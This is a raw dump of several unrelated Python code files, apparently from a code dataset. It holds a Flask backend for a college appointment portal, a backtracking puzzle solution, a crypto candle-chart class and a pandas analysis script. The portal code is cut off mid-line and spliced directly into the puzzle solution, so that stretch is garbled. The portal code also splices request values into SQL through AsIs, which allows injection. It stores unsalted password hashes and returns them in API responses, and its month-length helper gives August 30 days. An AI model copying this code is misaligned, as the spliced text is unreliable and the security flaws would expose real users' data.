#mobilenos= '1239991111'\n #depts= 'CSE'\n #typess= 'student'\n\n #password encryption:\n password=hashlib.sha256(password.encode('utf-8')).hexdigest() #hashvalue\n\n #insert data into user db\n cursor.execute(\"INSERT INTO Users (u_id, uname, email, pwd, mobileno) VALUES(%s, %s, %s, %s, %s)\",(uids, names, emails, password, mobilenos))\n dbconn.commit()\n\n #getting dept id from department db\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT department_id from Departments where dname=%s\",(depts,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n\n if typess=='student':\n cursor = dbconn.cursor()\n cursor.execute(\"INSERT INTO Student (roll_no, deptid) VALUES(%s, %s)\",(uids, deptids))\n dbconn.commit()\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n elif typess=='faculty':\n cursor = dbconn.cursor()\n cursor.execute(\"INSERT INTO Faculty (ssn, deptid) VALUES(%s, %s)\",(uids, deptids))\n dbconn.commit()\n\n return jsonify({\"u_id\":uids,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"deptid\":deptids,\"dname\":depts})\n\n#########################################################################################################################\n\n#Gets the fac_id and name of all the faculties\n@app.route(\"/list_all_fac\",methods=[\"POST\"])\n#@app.route(\"/list_all_fac\")\ndef listAllFacPage():\n cursor = dbconn.cursor()\n list_of_uname=[]\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT u.u_id,u.uname FROM Users u, Faculty f WHERE u.u_id=f.ssn\")\n list_of_uname=cursor.fetchall()\n response=list(map(lambda x: {\"u_id\":x[0],\"uname\":x[1]},list_of_uname))\n dbconn.commit()\n\n return jsonify(response)\n\n#########################################################################################################################\n\n#Gets all the ids and names of the departments\n@app.route(\"/list_all_departments\",methods=[\"POST\"])\n#@app.route(\"/list_all_fac\")\ndef listAllDeptPage():\n cursor = dbconn.cursor()\n list_of_uname=[]\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT department_id,dname from Departments\")\n list_of_dname=cursor.fetchall()\n response=list(map(lambda x: {\"dept_id\":x[0],\"dname\":x[1]},list_of_dname))\n dbconn.commit()\n\n return jsonify(response)\n\n#########################################################################################################################\n\n#Gets details of a specific user\n@app.route(\"/details\",methods=[\"POST\"])\n#@app.route(\"/details\")\ndef details():\n cursor = dbconn.cursor()\n uid= request.json['u_id']\n cursor.execute(\"SELECT * FROM Users WHERE u_id=%s\",(uid,))\n details=cursor.fetchone()\n dbconn.commit()\n\n cursor.execute(\"SELECT COUNT(*) FROM Student WHERE roll_no=%s\",(uid,))\n isStudent=cursor.fetchone()[0]\n dbconn.commit()\n if isStudent:\n cursor.execute(\"SELECT deptid FROM Student WHERE roll_no=%s\",(uid,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n else:\n cursor.execute(\"SELECT deptid FROM Faculty WHERE ssn=%s\",(uid,))\n deptids= cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT dname FROM Departments WHERE department_id=%s\",(deptids,))\n deptname= cursor.fetchone()[0]\n dbconn.commit()\n if details:\n u_id,names,emails,password,mobilenos=details\n return jsonify({\"u_id\":u_id,\"uname\":names,\"email\":emails,\"pwd\":password,\"mobileno\":mobilenos,\"dname\":deptname})\n else:\n return jsonify(message=\"Invalid ID\")\n\n#########################################################################################################################\n\n#insert the appointment into the appointments DB and saves the state as 'pending'\n@app.route(\"/request_stud\",methods=[\"POST\"])\n#@app.route(\"/request_stud\")\ndef request_stud():\n cursor = dbconn.cursor()\n\n #date_created = \"2020-12-03\"\n #date_appointment = \"2020-12-31\"\n #time_appointment = \"10:00:00\"\n #title = \"email test\"\n #description = \"email test des\"\n #stud_id = \"B190CS\"\n #fac_id = \"667\"\n\n date_created= request.json['date_created']\n date_appointment= request.json['date_appointment']\n time_appointment= request.json['time_appointment']\n title= request.json['title']\n description= request.json['description']\n stud_id= request.json['stud_id']\n fac_id= request.json['fac_id']\n dateTime = date_appointment + \"#\" + time_appointment\n\n\n # we are concatinating the date and time to get the datetime\n # because our database only has one column for datetime\n\n #status will be 1 for pending\n try:\n cursor.execute(\"INSERT INTO Appointments (status, date_created, date_scheduled, title, decription, stu_id, fac_id) VALUES(%s, %s, %s, %s, %s, %s, %s)\",(\"1\", date_created, dateTime, title, description, stud_id, fac_id))\n dbconn.commit()\n\n except:\n return jsonify(message=\"Invalid appointment request\")\n\n #sending email to the faculty\n cursor.execute(\"SELECT email from Users where u_id=%s\",(fac_id,))\n email=cursor.fetchone()[0]\n dbconn.commit()\n\n cursor.execute(\"SELECT uname from Users where u_id=%s\",(stud_id,))\n stud_name=cursor.fetchone()[0]\n dbconn.commit()\n\n msg = Message(f'{stud_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{email}'])\n msg.body = f'{stud_name} has requested an appointment with you.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n\n\n return jsonify(message=\"Appointment Requested\")\n\n#########################################################################################################################\n\n#Gets details of an appointment\n@app.route(\"/get_appt\",methods=[\"POST\"])\ndef get_appt():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='20'\n valid=-1\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n valid=cursor.fetchone()\n dbconn.commit()\n appointment_id,status,date_created,dateTime,title,decription,stu_id,fac_id,suggested_date,faculty_message = valid\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()[0]\n dbconn.commit()\n date_scheduled,time_scheduled = dateTime.split(\"#\")\n if valid:\n return jsonify({\"appointment_id\":appointment_id,\"status\":status,\"date_created\":date_created,\"date_scheduled\":date_scheduled,\"time_scheduled\":time_scheduled,\"title\":title,\"decription\":decription,\"suggested_date\":suggested_date,\"faculty_message\":faculty_message,\"stu_name\":stu_name,\"fac_name\":fac_name})\n else:\n return jsonify(message=\"Error: appointment doesn't exist\")\n\n#########################################################################################################################\n\n#Deletes an appointment from the DB\n@app.route(\"/delete_appt\",methods=[\"DELETE\"])\n#@app.route(\"/delete_appt\")\n\ndef delete_appt():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='20'\n valid=-1\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n valid=cursor.fetchone();\n dbconn.commit()\n if valid:\n cursor.execute(\"DELETE from Appointments where appointment_id=%s\",(appt_id,))\n dbconn.commit()\n return jsonify(message=\"deleted\")\n else:\n return jsonify(message=\"Error: appointment doesn't exist\")\n\n#########################################################################################################################\n\n#Rejects an appointment and saves the appointment state as 'rejected'\n@app.route(\"/reject_stud\",methods=[\"POST\"])\n#@app.route(\"/reject_stud\")\ndef reject_stud():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='19'\n cursor.execute(\"SELECT * FROM Appointments where appointment_id=%s\",(appt_id,))\n appointment_id, status, date_created, dateTime, title, decription, stu_id, fac_id, suggested_date, faculty_message = cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"UPDATE Appointments SET status='2' where appointment_id=%s\",(appt_id,))\n dbconn.commit()\n date_scheduled,time_scheduled = dateTime.split(\"#\")\n\n #get the email, name of the student and faculty\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(fac_id,))\n fac_email, fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(stu_id,))\n stu_email, stu_name=cursor.fetchone()\n dbconn.commit()\n\n\n if status == '1':\n #send a mail to the student with the message that the appointment has been rejected\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n msg.body = f'Your appointment with {fac_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {date_scheduled}\\nTime: {time_scheduled}\\n\\nPlease login to the portal to make another appointment.'\n mail.send(msg)\n else:\n #send a mail to the faculty with the message that the appointment has been rejected\n msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{fac_email}'])\n #msg.body = f'Your appointment with {stu_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {dateTime}\\n\\nPlease login to the portal to make another appointment.'\n msg.body = f'Your appointment with {stu_name} has been rejected.\\n\\nTitle: {title}\\nDescription: {decription}\\nDate: {date_scheduled}\\nTime: {time_scheduled}\\n\\nPlease login to the portal to make another appointment.'\n mail.send(msg)\n return jsonify({\"appt_id\":appt_id,\"status\":2})\n\n#########################################################################################################################\n\n#Approves an appointment by saving the appt state as 'accepted'\n@app.route(\"/approval_stud\",methods=[\"POST\"])\n#@app.route(\"/approval_stud\")\ndef approval_stud():\n cursor=dbconn.cursor()\n appt_id=request.json[\"appt_id\"]\n #appt_id='10'\n cursor.execute(\"SELECT status, stu_id, fac_id, title, suggested_date, date_scheduled, decription FROM Appointments WHERE appointment_id=%s;\",(appt_id,))\n status, stu_id, fac_id, title, dateTime, dateTime2, description=cursor.fetchone()\n dbconn.commit()\n #print(dateTime, dateTime2)\n if status==\"4\" and dateTime!='-1':\n date_appointment,time_appointment = dateTime.split(\"#\")\n else:\n date_appointment,time_appointment = dateTime2.split(\"#\")\n #print(status, stu_id, fac_id)\n\n #get the email of the student and faculty\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(stu_id,))\n stu_email, stu_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT email, uname from Users where u_id=%s\",(fac_id,))\n fac_email, fac_name=cursor.fetchone()\n #print(fac_email, fac_name)\n dbconn.commit()\n if (status==\"4\"):\n # we are here means the faculty asked for a reschedule\n # and student is approving the reschedule\n cursor.execute(\"UPDATE Appointments SET status='3', date_scheduled=suggested_date, suggested_date=-1,faculty_message=NULL WHERE appointment_id=%s;\",(appt_id,))\n dbconn.commit()\n\n #send email to the faculty that the student has approved the reschedule\n msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{fac_email}'])\n #msg = Message(f'{stu_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = f'{stu_name} has approved the reschedule request for the appointment.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n else:\n cursor.execute(\"UPDATE Appointments SET status='3' WHERE appointment_id=%s ;\",(appt_id,))\n dbconn.commit()\n\n #send email to the student that the appointment has been approved\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n #msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = ['naveen_b190707cs@nitc.ac.in'])\n msg.body = f'{fac_name} has approved the appointment request for you.\\n\\nTitle: {title}\\nDescription: {description}\\nDate: {date_appointment}\\nTime: {time_appointment}\\n\\nPlease login to the portal to accept or reject the request.'\n mail.send(msg)\n\n return jsonify({\"appt_id\":appt_id,\"status\":3})\n\n#########################################################################################################################\n\n#Sends all the appointments of a student\n@app.route(\"/view_all_student\",methods=[\"POST\"])\n#@app.route(\"/view_all\")\ndef view_all_student():\n # takes in the admin id\n u_id= request.json['u_id']\n cursor=dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where stu_id=%s ORDER by date_scheduled\",(u_id,))\n list_of_apt=cursor.fetchall()\n dbconn.commit()\n if not list_of_apt:\n return jsonify(message2=\"There are no appointments\")\n\n list_of_apt_details=[]\n for i in list_of_apt:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = i\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()\n dbconn.commit()\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n list_of_apt_details.append({\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, \"stu_id\": stu_id, \"stu_name\":stu_name,\"fac_id\": fac_id, \"fac_name\": fac_name, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message})\n return jsonify(list_of_apt_details)\n\n\n######################################## FACULTY STUFF #########################################\n\n#Sends all appointments related to the faculty\n@app.route(\"/view_all_faculty\",methods=[\"POST\"])\n#@app.route(\"/view_all\")\ndef view_all_faculty():\n # takes in the faculty id\n u_id= request.json['u_id']\n cursor=dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where fac_id=%s ORDER by date_scheduled\",(u_id,))\n list_of_apt=cursor.fetchall()\n dbconn.commit()\n if not list_of_apt:\n return jsonify(message2=\"There are no appointments\")\n\n list_of_apt_details=[]\n for i in list_of_apt:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = i\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(fac_id,))\n fac_name=cursor.fetchone()\n dbconn.commit()\n cursor.execute(\"SELECT uname FROM Users WHERE u_id=%s\",(stu_id,))\n stu_name=cursor.fetchone()\n dbconn.commit()\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n list_of_apt_details.append({\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, \"stu_id\": stu_id, \"stu_name\":stu_name,\"fac_id\": fac_id, \"fac_name\": fac_name, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message})\n return jsonify(list_of_apt_details)\n\n#########################################################################################################################\n\n#Reschedules an appointment by changing the appt state to 'rescheduled'\n#@app.route(\"/reschedule\")\n@app.route(\"/reschedule\", methods=[\"POST\"])\ndef reschedule():\n\n cursor = dbconn.cursor()\n\n fac_id= request.json['u_id']\n apt_id= request.json['apt_id']\n fac_msg=request.json['fac_msg']\n suggested_date=request.json['suggested_date']\n suggested_time=request.json['suggested_time']\n\n #fac_id= '123'\n #apt_id= '12'\n #fac_msg='busy'\n #suggested_date='2020-12-07'\n #suggested_time='17:00:00'\n\n status='4' #default value\n\n suggested_datetime=suggested_date+\"#\"+suggested_time\n cursor.execute(\"UPDATE Appointments SET suggested_date=%s,faculty_message=%s,status=%s where fac_id=%s and appointment_id=%s\",(suggested_datetime,fac_msg,status,fac_id,apt_id))\n dbconn.commit()\n cursor.execute(\"SELECT * from Appointments where fac_id=%s and appointment_id=%s\",(fac_id,apt_id))\n resc_apt=cursor.fetchone()\n dbconn.commit()\n if not resc_apt:\n return jsonify(message=\"There are no appointments\")\n else:\n aptId, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = resc_apt\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n resc_apt={\"aptId\": aptId, \"status\": status, \"date_created\": date_created, \"date_scheduled\": date_scheduled, \"time_scheduled\": time_scheduled, \"title\": title, \"description\": description, \"stu_id\": stu_id, \"fac_id\": fac_id, \"suggested_date\": suggested_date, \"faculty_message\": faculty_message}\n cursor.execute(\"SELECT uname from Users where u_id=%s;\",(fac_id,))\n fac_name=cursor.fetchone()[0]\n dbconn.commit()\n cursor.execute(\"SELECT email from Users where u_id=%s;\",(stu_id,))\n stu_email=cursor.fetchone()[0]\n dbconn.commit()\n msg = Message(f'{fac_name} : {title}', sender = 'nitc.email.bot@gmail.com', recipients = [f'{stu_email}'])\n msg.body = f'{fac_name} has asked to reschedule your request for an appointment.\\n\\nTitle: {title}\\nDescription: {description}\\nOld date: {date_scheduled}\\nOld time: {time_scheduled}\\nto-\\nNew date: {suggested_date}\\nNew time: {suggested_time}\\nFaculty message: {faculty_message}\\n\\nPlease login to the portal to accept or reject the suggestion.'\n mail.send(msg)\n return jsonify(resc_apt)\n\n##################################################################################################\n\n#api to accept the appointment by saving the appt state as 'accepted'\n@app.route(\"/accept\",methods=[\"POST\"])\ndef accept():\n # takes in the appointment id\n apt_id= request.json['apt_id']\n #apt_id=\"2233asdfasd3\"\n try:\n cursor = dbconn.cursor()\n cursor.execute(\"SELECT * from Appointments where appointment_id=%s\",(apt_id,))\n apt_details=cursor.fetchone()\n except:\n return jsonify(message=\"Invalid apt_id\")\n if apt_details is None:\n return jsonify(message=\"No appointment with this id\")\n appointment_id, status, date_created, dateTime, title, description, stu_id, fac_id, suggested_date, faculty_message = apt_details\n date_scheduled = dateTime.split(\"#\")[0]\n time_scheduled = dateTime.split(\"#\")[1]\n\n #UPdate the status to 3 for accepted if the current status is 1\n if status == \"1\":\n cursor = dbconn.cursor()\n cursor.execute(\"UPDATE Appointments SET status=%s WHERE appointment_id=%s\",(\"3\",apt_id))\n dbconn.commit()\n return jsonify(\n {\n \"message\":\"Appointment Accepted\",\n },\n {\n appointment_id: {\n \"status\": \"3\",\n \"date_created\": date_created,\n \"date_scheduled\": date_scheduled,\n \"time_scheduled\": time_scheduled,\n \"title\": title,\n \"description\": description,\n \"stu_id\": stu_id,\n \"fac_id\": fac_id,\n \"suggested_date\": suggested_date,\n \"faculty_message\": faculty_message\n }\n }\n )\n elif status == \"3\":\n return jsonify(message=\"Appointment already accepted\")\n elif status == \"2\":\n return jsonify(message=\"Appointment already rejected\")\n else:\n return jsonify(message=\"Appointment waiting for student aproval\")\n return jsonify(message=\"this will never be seen Appointment Accepted\")\n\n\n##################################################################################################\n\n#List all the appointments related to a faculty in a particular month of a year\n@app.route(\"/apt_by_month\",methods=[\"POST\"])\ndef apt_by_month():\n def getmonthlength(monthnum,yearnum):\n if monthnum in [1,3,5,7,10,12]:\n return 31\n elif monthnum in [4,6,8,9,11]:\n return 30\n else:\n if((yearnum % 400 == 0) or (yearnum % 100 != 0) and (yearnum % 4 == 0)):\n return 29\n else:\n return 28\n cursor=dbconn.cursor()\n \"\"\" {\n \"fac_id\":\"123\",\n \"month\":\"12\",\n \"year\" : \"2020\"\n } \"\"\"\n fac_id=request.json[\"fac_id\"]\n month=request.json[\"month\"]\n year=request.json[\"year\"]\n perc='%'\n cursor.execute(\"SELECT * FROM Appointments WHERE fac_id=%s AND status='3' AND date_scheduled LIKE '%s-%s-%s' ORDER BY date_scheduled\",(fac_id,AsIs(year),AsIs(month),AsIs(perc)))\n all_appts_of_month=cursor.fetchall()\n dbconn.commit()\n weekarr=[]\n montharr=[]\n dayarr=[]\n weekcount=0\n index=0\n length= getmonthlength(int(month),int(year));\n print(\"monthlength: \",length)\n for daycount in range(length):\n if (daycount%7==0 and daycount!=0):\n montharr.append(weekarr)\n weekarr=[]\n weekcount+=1\n\n while index List[List[int]]:\n #바로 전 인덱스값이 현재 인덱스값과 같으면 현재 브랜치를 선택하지 않는다.\n candidates.sort()\n res = []\n def backtrack(cur, index, target):\n if target <= 0:\n if target == 0:\n res.append(cur.copy())\n return\n\n for i in range(index, len(candidates)):\n if i > index and candidates[i] == candidates[i-1]:\n continue\n cur.append(candidates[i])\n backtrack(cur, i+1, target-candidates[i])\n cur.pop()\n\n backtrack([], 0, target)\n return res\n","repo_name":"llunaB/algorithmn","sub_path":"0502_알고리즘-recursion,backtracking/40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30683335453","text":"from . import requests\r\nimport datetime\r\nimport time\r\nimport math\r\nimport json\r\nimport os\r\n\r\n\r\nclass Chart:\r\n\tcandles = list()\r\n\t_pair = \"\"\r\n\t_width = \"\"\r\n\t_startTime = 0\r\n\t_endTime = 0\r\n\r\n\r\n\tdef __init__(self, pair, width, startTime=0, endTime=-1):\r\n\t\tself._pair = pair\r\n\t\tif Chart.widthToSec(width) < 900:\r\n\t\t\traise ValueError(\"Width must be no smaller than 15m\")\r\n\t\tself._width = width\r\n\t\tself._startTime = startTime\r\n\t\tif endTime == -1:\r\n\t\t\tself._endTime = time.time()\r\n\t\telse:\r\n\t\t\tself._endTime = endTime\r\n\t\tif self.checkUpdate():\r\n\t\t\tself._updateCandles()\r\n\t\tself._getCandles()\r\n\t\t\r\n\r\n\r\n\tdef _getCandles(self):\r\n\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\tfileStr = candlesFile.read()\r\n\t\tcandlesFile.close()\r\n\r\n\t\tif fileStr == None:\r\n\t\t\treturn\r\n\t\tcandles = json.loads(fileStr)\r\n\t\tif len(candles) == 0:\r\n\t\t\treturn\r\n\r\n\t\tstartIndex = math.ceil((self._startTime - candles[0][0]) / 900)\r\n\t\tendIndex = math.ceil((self._endTime - candles[0][0]) / 900)\r\n\r\n\t\tif startIndex < 0:\r\n\t\t\tstartIndex = 0\r\n\t\tif endIndex >= len(candles):\r\n\t\t\tendIndex = len(candles)\r\n\r\n\t\tif startIndex >= endIndex:\r\n\t\t\treturn []\r\n\r\n\t\tcandles = candles[startIndex:endIndex]\r\n\t\tif len(candles) < 2:\r\n\t\t\tself.candles = candles\r\n\t\telse:\r\n\t\t\tself.candles = self._convertCandles(candles, Chart.widthToSec(self._width))\r\n\r\n\r\n\r\n\tdef checkUpdate(self):\r\n\t\tfileStr = \"\"\r\n\t\ttry:\r\n\t\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\t\tfileStr = candlesFile.read()\r\n\t\t\tcandlesFile.close()\r\n\t\texcept FileNotFoundError as e:\r\n\t\t\tpass\r\n\r\n\t\tif fileStr != \"\":\r\n\t\t\tcandles = json.loads(fileStr)\r\n\t\t\tif len(candles) > 0 and self._endTime <= candles[-1][0]:\r\n\t\t\t\treturn False\r\n\r\n\t\treturn True\r\n\r\n\r\n\r\n\tdef _updateCandles(self):\r\n\t\tfileStr = \"\"\r\n\t\ttry:\r\n\t\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"r\")\r\n\t\t\tfileStr = candlesFile.read()\r\n\t\t\tcandlesFile.close()\r\n\t\texcept FileNotFoundError as e:\r\n\t\t\tpass\r\n\r\n\t\tcandles = list()\r\n\t\tstartTime = 0\r\n\t\tstartPrice = 0\r\n\t\tif fileStr != \"\":\r\n\t\t\tcandles = json.loads(fileStr)\r\n\t\t\tif len(candles) > 0:\r\n\t\t\t\tdel candles[-1]\r\n\t\t\t\tif len(candles) > 0:\r\n\t\t\t\t\tstartTime = candles[-1][0] + 900\r\n\t\t\t\t\tstartPrice = candles[-1][4]\r\n\t\t\t\r\n\t\twhile True:\r\n\t\t\tnewCandles = self._fetchCandles(self._pair, startPrice, startTime)\r\n\t\t\tif len(newCandles) == 0:\r\n\t\t\t\tbreak\r\n\t\t\tcandles += newCandles\r\n\t\t\tstartTime = candles[-1][0] + 900\r\n\t\t\tstartPrice = candles[-1][4]\r\n\r\n\t\tcandlesFile = open(self._getCandlesPath(self._pair), \"w\")\r\n\t\tcandlesFile.write(str(candles))\r\n\t\tcandlesFile.close()\r\n\t\t\r\n\r\n\r\n\tdef _fetchCandles(self, pair, startPrice=0, startTime=0):\r\n\t\turl = \"/v2/candles/trade:15m:t\" + pair.replace(\"-\", \"\")\r\n\t\turl += \"/hist?limit=1000&sort=1&start=\" + str(startTime * 1000)\r\n\r\n\t\treq = requests.Requests()\r\n\t\tcandles = req.request(url)\r\n\t\tif candles == None:\r\n\t\t\treturn list()\r\n\r\n\t\tfor i in range(len(candles)):\r\n\t\t\tcandles[i] = [\r\n\t\t\t\tround(candles[i][0] / 1000),\r\n\t\t\t\tcandles[i][1],\r\n\t\t\t\tcandles[i][3],\r\n\t\t\t\tcandles[i][4],\r\n\t\t\t\tcandles[i][2],\r\n\t\t\t\tcandles[i][5]\r\n\t\t\t]\r\n\r\n\t\tif startTime == 0:\r\n\t\t\tstartTime = candles[0][0]\r\n\t\t\tstartPrice = candles[0][1]\r\n\r\n\t\tendTime = 0\r\n\t\tif len(candles) > 0:\r\n\t\t\tendTime = candles[-1][0]\r\n\t\t\t\r\n\t\treturn self._fillCandles(candles, startPrice, startTime, endTime + 900)\r\n\r\n\r\n\r\n\tdef _fillCandles(self, candles, startPrice, startTime, endTime):\r\n\t\tlastTime = startTime - 900\r\n\t\tlastPrice = startPrice\r\n\t\tnewCandles = list()\r\n\t\tfor i in range(len(candles)):\r\n\t\t\tthisTime = candles[i][0]\r\n\r\n\t\t\tfor j in range(lastTime + 900, thisTime, 900):\r\n\t\t\t\tnewCandles.append([j, lastPrice, lastPrice, lastPrice, lastPrice, 0])\r\n\t\t\tnewCandles.append(candles[i])\r\n\t\t\tlastTime = thisTime\r\n\t\t\tlastPrice = candles[i][4]\r\n\r\n\t\tfor i in range(lastTime + 900, endTime, 900):\r\n\t\t\tnewCandles.append([i, lastPrice, lastPrice, lastPrice, lastPrice, 0])\r\n\r\n\t\treturn newCandles\r\n\r\n\r\n\r\n\tdef _convertCandles(self, candles, newWidthSec):\r\n\t\tif len(candles) < 2:\r\n\t\t\treturn None\r\n\t\twidthSec = candles[1][0] - candles[0][0]\r\n\t\tif newWidthSec < widthSec or newWidthSec % widthSec != 0:\r\n\t\t\treturn None\r\n\r\n\t\tstartTime = math.ceil(candles[0][0] / newWidthSec) * newWidthSec\r\n\t\tstartIndex = int((startTime - candles[0][0]) / widthSec)\r\n\t\tstep = int(newWidthSec / widthSec)\r\n\t\tnewCandles = list()\r\n\t\tfor i in range(startIndex, len(candles), step):\r\n\t\t\thigh = candles[i][2]\r\n\t\t\tlow = candles[i][3]\r\n\t\t\tclose = 0\r\n\t\t\tvolume = 0\r\n\t\t\tfor j in range(step):\r\n\t\t\t\tif i + j >= len(candles):\r\n\t\t\t\t\tbreak\r\n\t\t\t\tif candles[i + j][2] > high:\r\n\t\t\t\t\thigh = candles[i + j][2]\r\n\t\t\t\tif candles[i + j][3] < low:\r\n\t\t\t\t\tlow = candles[i + j][3]\r\n\t\t\t\tclose = candles[i + j][4]\r\n\t\t\t\tvolume += candles[i + j][5]\r\n\t\t\tnewCandle = [candles[i][0], candles[i][1], high, low, close, volume]\r\n\t\t\tnewCandles.append(newCandle)\r\n\r\n\t\treturn newCandles\r\n\r\n\r\n\r\n\tdef _getCandlesPath(self, pair):\r\n\t\trelative = \"candles/\" + pair + \".json\"\r\n\t\treturn os.path.join(os.path.dirname(__file__), relative)\r\n\r\n\r\n\r\n\t@staticmethod\r\n\tdef widthToSec(width):\r\n\t\tif width[-1] == \"m\":\r\n\t\t\treturn int(width[:-1]) * 60\r\n\t\telif width[-1] == \"h\":\r\n\t\t\treturn int(width[:-1]) * 60 * 60\r\n\t\telif width[-1] == \"d\":\r\n\t\t\treturn int(width[:-1]) * 60 * 60 * 24\r\n\t\telse:\r\n\t\t\treturn int(width[:-1]) * 60 * 60 * 24 * 7\r\n\r\n\r\n\r\n\t@staticmethod\r\n\tdef secToWidth(sec):\r\n\t\tw = sec / (60 * 60 * 24 * 7)\r\n\t\tif int(w) == w:\r\n\t\t\treturn str(int(w)) + \"w\"\r\n\t\td = sec / (60 * 60 * 24)\r\n\t\tif int(d) == d:\r\n\t\t\treturn str(int(d)) + \"d\"\r\n\t\th = sec / (60 * 60)\r\n\t\tif int(h) == h:\r\n\t\t\treturn str(int(h)) + \"h\"\r\n\r\n\t\treturn str(int(sec / 60)) + \"m\"","repo_name":"Colman/Trading","sub_path":"exchange/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29143894179","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n\tobras = pd.read_csv(\"obras.csv\")\n\t\n\tobras['Numero'] = obras['Numero'].astype(\"Int64\")\n\tobras['Comuna'] = obras['Comuna'].astype(\"Int64\")\n\tobras['Longitud'] = obras['Longitud'].astype(\"float64\")\n\tobras['Latitud'] = obras['Latitud'].astype(\"float64\")\n\tobras['MetrosCuadrados'] = obras['MetrosCuadrados'].astype(\"float64\")\n\t\n\t#Latitud y Longitud\n\tprint (\"La medias de Longitud es : \" + str(obras[\"Longitud\"].mean()))\n\tprint (\"La medias de Latitud es: \" + str(obras[\"Latitud\"].mean()))\n\n\tprint (\"La diferencia entre medias es: \" + str(obras[\"Longitud\"].mean() - obras[\"Latitud\"].mean()))\n\n\tplt.figure(figsize=(16, 10), dpi= 80, facecolor='w', edgecolor='k')\n\tplt.scatter('Longitud', 'Latitud', \n data=obras[[\"Longitud\",\"Latitud\"]], \n s=20)\n\tplt.xticks(fontsize=12); plt.yticks(fontsize=12)\n\tplt.title(\"Disperción entre Longitud y Latitud\", fontsize=22)\n\tplt.xlabel(\"Longitud\")\n\tplt.ylabel(\"Latitud\")\n\tplt.savefig('analisisBivariado/latitud-longitud.png') \n\tplt.cla()\n\tplt.clf()\n\n\t# Barrio y MetrosCuadrados\n\n\tbarrioMetros = obras[[\"Barrio\",\"MetrosCuadrados\"]]\n\tbarrioMetros = barrioMetros.groupby(['Barrio'])[\"MetrosCuadrados\"].sum()\n\tax = barrioMetros.plot.barh(x=\"MetrosCuadrados\", y= \"Barrio\", rot=0, figsize=(15,15), fontsize = 13, title= 'Cantidad de metros cuadrados por barrio')\n\tplt.legend(loc='upper right', 